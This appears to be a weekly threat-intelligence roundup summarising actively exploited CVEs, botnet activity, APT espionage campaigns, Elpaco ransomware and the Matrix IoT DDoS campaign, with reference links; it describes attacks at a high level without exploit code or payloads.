This week, CISA's KEV catalog saw the addition of just one CVE, a critical improper authentication vulnerability in Array Networks AG and vxAG ArrayOS, underscoring the risks posed by unpatched systems. The ProjectSend vulnerability also remains actively exploited in the wild, amplifying the threat landscape for exposed platforms.

Meanwhile, the IoT_Reaper botnet continues to target vulnerabilities in MVPower CCTV DVRs, reinforcing its presence in the cyber threat ecosystem. Zerobot, focusing on a vulnerability in the Apache HTTP server (unpatched for over three years), has ramped up its activities, while established botnets like Enemybot, LiquorBot, and Mirai remain active, persistently exploiting a nine-year-old flaw in D-Link DIR 645 routers. These ongoing attacks emphasize the danger of outdated systems and unpatched vulnerabilities.

Cyber espionage groups, including Earth Kasha, Earth Estries, and APT-K-47, are exploiting weaknesses in public-facing systems to infiltrate networks for long-term surveillance and data theft. In parallel, the Elpaco ransomware, an advanced offshoot of Mimic, is exploiting RDP vulnerabilities and the Zerologon flaw to escalate privileges and deploy malware. Furthermore, Matrix is leveraging IoT device vulnerabilities for large-scale DDoS attacks, fueling disruptive botnets. These developments highlight the increasing sophistication and diversity of cyber threats targeting vulnerable systems across the globe.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2024-11680

An improper authentication vulnerability in the ProjectSend open-source file-sharing application has been identified, allowing remote, unauthenticated attackers to exploit it by sending specially crafted HTTP requests to the application's configuration. Rated with a CVSS score of 9.8 (critical), the flaw affects versions prior to r1720. While this vulnerability was initially patched in May 2023, it was only publicly disclosed with the release of version r1720 in August 2024. According to VulnCheck, this critical security issue has likely been actively exploited in the wild, with signs of exploitation observed across internet-facing instances of ProjectSend.

CVE-2023-28461

A critical improper authentication vulnerability in Array Networks AG and vxAG ArrayOS, affecting versions 9.4.0.481 and earlier, could be exploited remotely, allowing attackers to execute arbitrary code on affected systems. With a CVSS of 9.8, this vulnerability has been added to the CISA KEV catalog for urgent remediation.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.    

CVE-2024-7262

A high severity remote code execution vulnerability in the WPS Office for Windows was exploited in an August 2024 cyber attack linked to APT-C-60. This South Korea-aligned cyber espionage group used a job application-themed lure to deploy the SpyGlace backdoor, targeting an organization in Japan. The incident, disclosed by JPCERT/CC, highlights the group's advanced techniques and focus on East Asian entities.

CVE-2024-9680 and CVE-2024-49039

The Russia-aligned RomCom threat group has been linked to the exploitation of two zero-day vulnerabilities, one in Mozilla Firefox (CVE-2024-9680) and another in Microsoft Windows (CVE-2024-49039) in to deploy its backdoor malware. These sophisticated attacks require no user interaction (zero-click) and enable the adversary to execute arbitrary code by simply having the victim visit a compromised web page. This chain of exploits leads to the installation of the RomCom backdoor on the targeted system, highlighting the sophistication and stealth of the group's tactics.

CVE-2023-28461, CVE-2023-45727 and CVE-2023-27997

Trend Micro’s recent analysis highlighted that Earth Kasha, a China-linked cyber espionage group, has been actively exploiting these vulnerabilities in public-facing enterprise technologies such as Array AG(CVE-2023-28461), Proself(CVE-2023-45727) and Fortinet FortiOS (CVE-2023-27997) to establish initial access to target networks. to gain initial access to targeted networks. Since early 2023, Earth Kasha has leveraged these vulnerabilities as part of its ongoing LODEINFO campaign, primarily focusing on regions in Japan, Taiwan, and India. Once inside victim networks, the group deploys a range of backdoors to maintain persistence, including popular tools such as Cobalt Strike, its own LODEINFO malware, and the newly discovered NOOPDOOR.

CVE-2023-38831

A critical vulnerability in RARLAB WinRAR, affecting versions prior to 6.23, allows remote attackers to execute arbitrary code when opening specially crafted ZIP or RAR archives. The Knownsec 404 team identified that APT-K-47 (also known as Mysterious Elephant), a South Asia-based threat actor active since 2022, exploited this flaw in its campaigns. Using various iterations of its Asyncshell malware, including the advanced Asyncshell-v4, the group was able to execute cmd and PowerShell commands. The vulnerability served as the entry point for system access, highlighting the group’s advanced techniques and persistent efforts in targeting organizations.

CVE-2020-1472

Kaspersky Labs has identified a sophisticated ransomware variant called Elpaco, an advanced evolution of the Mimic ransomware family. This malware breaches systems through compromised Remote Desktop Protocol (RDP) connections, often gained via brute force attacks. Once inside, the attackers escalate their privileges by exploiting the critical Zerologon vulnerability (CVE-2020-1472), enabling full control over the victim's server and paving the way for ransomware deployment.

‍Matrix Threat Actor Exploits IoT Weaknesses in Global Campaign

The threat actor known as Matrix has been associated with a large-scale distributed denial-of-service (DDoS) campaign that exploits vulnerabilities and misconfigurations in Internet of Things (IoT) devices to create a disruptive botnet. This campaign utilizes known security flaws and weak or default credentials to compromise a wide array of internet-connected devices, including IP cameras, DVRs, routers, and telecom equipment. Matrix leverages publicly available tools and scripts from platforms like GitHub, deploying malware such as Mirai and various DDoS-related programs on compromised devices. These include PYbot, pynet, DiscordGo, Homo Network, an HTTP/HTTPS flood attack JavaScript program, and a utility capable of disabling Microsoft Defender Antivirus on Windows systems. These attacks have predominantly targeted IP addresses in China, Japan, and, to a lesser extent, regions like Argentina, Australia, Brazil, Egypt, India, and the U.S., highlighting the campaign's global reach and emphasis on exploiting IoT ecosystems.

Earth Estries: Exploiting N-Day Vulnerabilities to Deploy Custom Backdoors in Southeast Asia

The China-linked cyber-espionage group Earth Estries has been observed leveraging a previously undocumented backdoor known as GHOSTSPIDER in a series of attacks targeting telecommunications companies in Southeast Asia. According to Trend Micro, the group, classified as an aggressive advanced persistent threat (APT), has also deployed the MASOL RAT on Linux-based systems within government networks in the region. The attack campaigns begin with exploiting N-day vulnerabilities in widely used enterprise technologies, including Ivanti Connect Secure, Fortinet FortiClient EMS, Sophos Firewall, and Microsoft Exchange Server vulnerabilities (ProxyLogon CVEs). Once initial access is gained, the attackers deploy custom malware, such as Deed RAT, Demodex, and GHOSTSPIDER, to maintain persistence and conduct long-term cyber-espionage operations.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2024/11/25/cisa-adds-one-known-exploited-vulnerability-catalog  
2. https://blogs.jpcert.or.jp/ja/2024/11/APT-C-60.html  
3. https://securityonline.info/elpaco-ransomware-a-new-threat-actor-leverages-cve-2020-1472-for-global-attacks/  
4. https://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and-windows-zero-days-in-the-wild/  
5. https://www.trendmicro.com/en_us/research/24/k/lodeinfo-campaign-of-earth-kasha.html  
6. https://medium.com/@knownsec404team/unveiling-the-past-and-present-of-apt-k-47-weapon-asyncshell-5a98f75c2d68  
7. https://securelist.com/elpaco-ransomware-a-mimic-variant/114635/  
8. https://www.trendmicro.com/en_us/research/24/k/earth-estries.html